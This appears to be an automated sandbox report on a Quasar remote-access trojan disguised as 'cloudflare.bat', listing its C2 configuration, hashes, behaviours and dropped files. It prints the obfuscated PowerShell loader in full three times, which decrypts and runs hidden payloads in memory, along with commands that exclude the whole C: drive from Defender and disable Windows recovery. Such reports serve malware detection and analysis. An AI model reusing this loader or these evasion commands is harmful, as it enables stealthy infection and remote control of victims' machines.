quasar | d09f2f0f47441da499f40328373ea30f5b2fba8f75f8d84e1df54f0d39c363e8

Analysis

max time kernel
50s
max time network
51s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-01-2025 19:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cloudflare.bat
Size

1.6MB
MD5

d7ef2415ae2b53c9cc8d960f332b2fc2
SHA1

5ee9e9075d7eff88b9b6f6640dd23b04d3d89bf8
SHA256

d09f2f0f47441da499f40328373ea30f5b2fba8f75f8d84e1df54f0d39c363e8
SHA512

0d0b614e2f6c25408d3e35679d41dd9a96f90b54ffd373db1e5be1809d8384370baf391b0c55c6769b730d3ca319efcc052a3ebf77cf5cfb502dac66fd2489e4
SSDEEP

24576:6dbChi2BlJAy2y618+L24nMTz0ZpAsb1EwG5M1XxWMkp2b8DU+owr4SeBlKcvREH:9i2Bl+2TzZw5XMe4DU+zrSl+v

Score

10^/10

quasar explore execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

explore

45.88.186.152:4782

Mutex

4b5ff9f7-66f8-4c52-adcb-b84eb3e09f69

Attributes

encryption_key
0D83B228073938065AB8FEE60BD7542CA8D42A20
install_name
Onedrive.exe
log_directory
Logs
reconnect_delay
300
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/2360-44-0x0000020854370000-0x0000020854694000-memory.dmp	family_quasar

Blocklisted process makes network request 7 IoCs

flow	pid	Process
14	2360	powershell.exe
15	2360	powershell.exe
17	2360	powershell.exe
48	3296	powershell.exe
49	3296	powershell.exe
50	4556	powershell.exe
51	4556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4556	powershell.exe
2360	powershell.exe
3296	powershell.exe
4728	powershell.exe
2560	powershell.exe
1524	powershell.exe
5108	powershell.exe
2776	powershell.exe
3300	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5112	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 33 IoCs

pid	Process
2360	powershell.exe
2360	powershell.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
2360	powershell.exe
2360	powershell.exe
2776	powershell.exe
2776	powershell.exe
3296	powershell.exe
3296	powershell.exe
2560	powershell.exe
2560	powershell.exe
2560	powershell.exe
2560	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
3300	powershell.exe
3300	powershell.exe
4556	powershell.exe
4556	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe
5108	powershell.exe
5108	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2360	powershell.exe
3296	powershell.exe
4556	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3384 wrote to memory of 2360	3384	cmd.exe	84
PID 3384 wrote to memory of 2360	3384	cmd.exe	84
PID 2360 wrote to memory of 4728	2360	powershell.exe	86
PID 2360 wrote to memory of 4728	2360	powershell.exe	86
PID 2360 wrote to memory of 4344	2360	powershell.exe	88
PID 2360 wrote to memory of 4344	2360	powershell.exe	88
PID 2360 wrote to memory of 2776	2360	powershell.exe	91
PID 2360 wrote to memory of 2776	2360	powershell.exe	91
PID 1576 wrote to memory of 3296	1576	cmd.exe	118
PID 1576 wrote to memory of 3296	1576	cmd.exe	118
PID 3296 wrote to memory of 2560	3296	powershell.exe	119
PID 3296 wrote to memory of 2560	3296	powershell.exe	119
PID 3296 wrote to memory of 2812	3296	powershell.exe	121
PID 3296 wrote to memory of 2812	3296	powershell.exe	121
PID 3296 wrote to memory of 3300	3296	powershell.exe	123
PID 3296 wrote to memory of 3300	3296	powershell.exe	123
PID 5076 wrote to memory of 4556	5076	cmd.exe	128
PID 5076 wrote to memory of 4556	5076	cmd.exe	128
PID 4556 wrote to memory of 1524	4556	powershell.exe	129
PID 4556 wrote to memory of 1524	4556	powershell.exe	129
PID 4556 wrote to memory of 3096	4556	powershell.exe	131
PID 4556 wrote to memory of 3096	4556	powershell.exe	131
PID 4556 wrote to memory of 5108	4556	powershell.exe	133
PID 4556 wrote to memory of 5108	4556	powershell.exe	133

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cloudflare.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2360
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 2360 } | Select-Object -ExpandProperty Id"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4728
- - C:\Windows\SYSTEM32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in System32 directory
    - Drops file in Windows directory
    PID:4344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2776

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3508

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cloudflare.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cloudflare.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3296
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 3296 } | Select-Object -ExpandProperty Id"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2560
- - C:\Windows\SYSTEM32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in Windows directory
    PID:2812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cloudflare.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5076
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8bhRsRHlVCq0oE/jC8znaXL8N3C2l4vOkUX6p5fMCBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gSWUi9Srt/hMiTUvma/Osg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bvRls=New-Object System.IO.MemoryStream(,$param_var); $PBSCt=New-Object System.IO.MemoryStream; $pTrqw=New-Object System.IO.Compression.GZipStream($bvRls, [IO.Compression.CompressionMode]::Decompress); $pTrqw.CopyTo($PBSCt); $pTrqw.Dispose(); $bvRls.Dispose(); $PBSCt.Dispose(); $PBSCt.ToArray();}function execute_function($param_var,$param2_var){ $fcAKi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $byGGF=$fcAKi.EntryPoint; $byGGF.Invoke($null, $param2_var);}$QgxHT = 'C:\Users\Admin\AppData\Local\Temp\cloudflare.bat';$host.UI.RawUI.WindowTitle = $QgxHT;$SwrfE = [type]::GetType('System.IO.File');$OHVxV = [type]::GetType('System.Environment');$bNKIC = $SwrfE::('txeTllAdaeR'[-1..-11] -join '')($QgxHT);$BVkSS = $OHVxV::NewLine;$YddQR = $bNKIC.Split($BVkSS);$uUoiG = $YddQR;foreach ($IZmUa in $uUoiG) { if ($IZmUa.StartsWith(':: ')) { $tpTzT=$IZmUa.Substring(3); break; }}$payloads_var=[string[]]$tpTzT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Get-Process powershell | Where-Object { $_.Id -ne 4556 } | Select-Object -ExpandProperty Id"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\SYSTEM32\reagentc.exe
    "reagentc.exe" /disable
    3⤵
    - Drops file in Windows directory
    PID:3096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
108889a2224ffcf59d0f1b7d847c8ba9

SHA1
b95e111ac376a373309ffd0fe11f05524f05b273

SHA256
6f407ee1656e3a01f770ed5f48990286c895e68c411b843aa3db7fae099b99b1

SHA512
a290487f14fd660172e020eda44ccf690cbcde3781987cdbc927e1f2a58bbdace9ce1ff04f01b25411af359e8b488c596a0d28aed5cbc28cbfac2d9824769dcb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
70fae212ab56c3c0d3edc0902d62e025

SHA1
3287dc417d9064fa42025f432032a0c2d001b5fa

SHA256
951f91f310468b959ee9b1857120f961f8f37f86ced88a1599f170ba5b904f5e

SHA512
9573a1dc9167c03e4769fdbf2503a0524d87becc9d18e0d149f85b50b2a396fd687db747be20102eb35519d7efd1492a078769d925e618fd5c019fc98d44a4ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
367ece7bf3803eb08f224d6a82e13cfa

SHA1
fdb186e4b506f97d9604531acb87e47ae4220d81

SHA256
64e0ed7a9aee4fce0e99ad4aaf9f225774b3ce498bfa1373c6451c507f6fc501

SHA512
7df1cd239ee77201f0b845b137044ac57dff31b1853753e8b9b2bd8235a650d8d8de076468568a447dd18b3aad4fa9e04ada1269257ae2e54011dc48601608df

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cbgwo0bp.eeh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
4KB

MD5
c43e87650fa2634ab0bb3a0d61544be7

SHA1
c6b6b0786c5809cc2dc2378a3e6ed404dd162c67

SHA256
96cf8c6190dab6e6cfe665dd37fae6b7775db8e1317303bde0eddd8e113ae291

SHA512
2a629177a215394842daef337a90105c1ddc8259b0c933b3a3701f99578539c2e372644527b1288dac8167ac439a68702f94e2ecef9885ffe542d1460ae09cdd

Download Submit
C:\Windows\Logs\ReAgent\ReAgent.log

Filesize
2KB

MD5
0d1ba5515251a2f1d60061b7f8ce619a

SHA1
9760b7819e293f361bb292ad5ce996f85355b76f

SHA256
fa24472b0259587db683e2dfb11678a64b420ddf209cabe67624fef6bddbd438

SHA512
e229e6277047a4b8f9c17bbd8a09a0392e3608f640c53ca6fff7d7a4ef8a3e4c3312494c729a3b53c57a537de10184eb0836744226688ecd5a8a655724cd13f0

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
13KB

MD5
0633139d4d6835b2457c81e86519fb9c

SHA1
fc0a1abba20c59d8b401cd7305da1b62be92f680

SHA256
4ab60225f491575667fe76678927cd63909722a481e7f16e00563130a5d00e4b

SHA512
35494cc3116b9c8b848cfeaf6a8d2d878f4b63ab89bf534dd12535f42449e21c97e68a79597ff6f2c1b4a0d4dcd470e35166dd903f40f65bbcda36b38d16f0aa

Download Submit
C:\Windows\Panther\UnattendGC\diagerr.xml

Filesize
11KB

MD5
96c42a80526486d6beadc2ef4c4bb997

SHA1
a19791514707d7a6f86351de5ba8b7ff7c6b31e8

SHA256
96c5999f44e4c95ee529254a5c7c6fe050bff4f889951782f2532becb5c7cca0

SHA512
b99540e5c536bcac65a89a2cf407806c610a8bfb4f9ed181d40aeac664ccf9a7b2db8e359e21adc54d3a21a8239dbf1d84c6421013f21d2246e64be161291cb6

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
15KB

MD5
23c08be402560d3549432038fa590a80

SHA1
9de75918ed139cd5478977f6c258dad8c6867d10

SHA256
a9f4c9a66ed8ce7e80f24c1e75c1b65afdcb5c57c84893ce2ff45b9f575d66a8

SHA512
fbc1250e8d49a327b60af0fbd584687193e12b4d3eb3f541ba6ef7366efe1fa1fc93d11b14fb937993dc36ed2564688dcec40fdba876589092915a9de5c4b2e0

Download Submit
C:\Windows\Panther\UnattendGC\diagwrn.xml

Filesize
13KB

MD5
c6126276192b0c3803ebc6a7f6847141

SHA1
8373d6f6b14378b085b8ee3fcbe94abdf8d57c1b

SHA256
e484d6309326a7569b35b9e3c7d1c0aee732f30049602237bd24a315bb57b5f2

SHA512
7c02d48420a05f3afc490bd8ea0b07c9896a66902b384447bb35a8226baea136ed73cfb72247c3c3cba504fa9fa61a8abad0e788559b8fe4e232b2ab8236e7c9

Download Submit
C:\Windows\Panther\UnattendGC\setuperr.log

Filesize
193B

MD5
3bd7ca1b2a09134c7615621654579db7

SHA1
ae9a9155faba5ed45a311a94cc7c3e7d6782aa9f

SHA256
527092aac04503d59d8d21b61eef9668ca9895359745606d84575e6dd40dbe29

SHA512
74ee86327567814749f29e34db3d97dcca86e3a5c142a1a3720a86bdb5d9af748901196cce8c3b68c26079f16bd048df1f84b9d271c87346059d282be48544b0

Download Submit
C:\Windows\system32\Recovery\ReAgent.xml

Filesize
1KB

MD5
44b2da39ceb2c183d5dcd43aa128c2dd

SHA1
502723d48caf7bb6e50867685378b28e84999d8a

SHA256
894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

SHA512
17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

Download Submit
memory/2360-53-0x0000020854D60000-0x0000020854D9C000-memory.dmp

Filesize
240KB

Download
memory/2360-44-0x0000020854370000-0x0000020854694000-memory.dmp

Filesize
3.1MB

Download
memory/2360-52-0x0000020854D00000-0x0000020854D12000-memory.dmp

Filesize
72KB

Download
memory/2360-0-0x00007FFE02ED3000-0x00007FFE02ED5000-memory.dmp

Filesize
8KB

Download
memory/2360-54-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/2360-55-0x00007FFE02ED3000-0x00007FFE02ED5000-memory.dmp

Filesize
8KB

Download
memory/2360-56-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/2360-57-0x0000020855E70000-0x0000020856398000-memory.dmp

Filesize
5.2MB

Download
memory/2360-48-0x0000020854DC0000-0x0000020854E72000-memory.dmp

Filesize
712KB

Download
memory/2360-79-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/2360-47-0x0000020854CB0000-0x0000020854D00000-memory.dmp

Filesize
320KB

Download
memory/2360-49-0x0000020855050000-0x0000020855212000-memory.dmp

Filesize
1.8MB

Download
memory/2360-6-0x0000020853E30000-0x0000020853E52000-memory.dmp

Filesize
136KB

Download
memory/2360-11-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/2360-12-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/2360-13-0x0000020853E20000-0x0000020853E28000-memory.dmp

Filesize
32KB

Download
memory/2360-14-0x0000020854100000-0x0000020854232000-memory.dmp

Filesize
1.2MB

Download
memory/4728-15-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/4728-16-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/4728-26-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download
memory/4728-29-0x00007FFE02ED0000-0x00007FFE03991000-memory.dmp

Filesize
10.8MB

Download